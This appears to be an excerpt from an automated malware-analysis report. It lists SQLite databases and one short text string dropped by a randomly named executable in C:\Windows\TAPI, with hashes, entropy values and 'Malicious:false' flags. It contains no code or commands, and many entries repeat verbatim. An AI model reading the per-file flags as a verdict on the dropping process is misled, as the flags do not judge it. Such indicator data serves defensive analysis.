                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.323856189774724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:K5Ggv2n:K5GRn
                                                                                                                                                                        MD5:AF6A61A02B5A29E557C88DDA1CC05B28
                                                                                                                                                                        SHA1:71185C9167A045CA11B5802B7234B78F2F768699
                                                                                                                                                                        SHA-256:7B5343028F3FB920865715CFAD2BD679BAD552BD518BE9F23BC22F9F3E506D11
                                                                                                                                                                        SHA-512:A5DE8FC1EDD0468B0D15950E5660F5B1756121ED69593EEAC66BD9C328C96722450506A0874350DCFD1E8E0C178C0332BF2DC870E0C4EAE18CF0B6438E3B46EA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:2JghUgfu7TL55YAWhzzBOMNmS
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
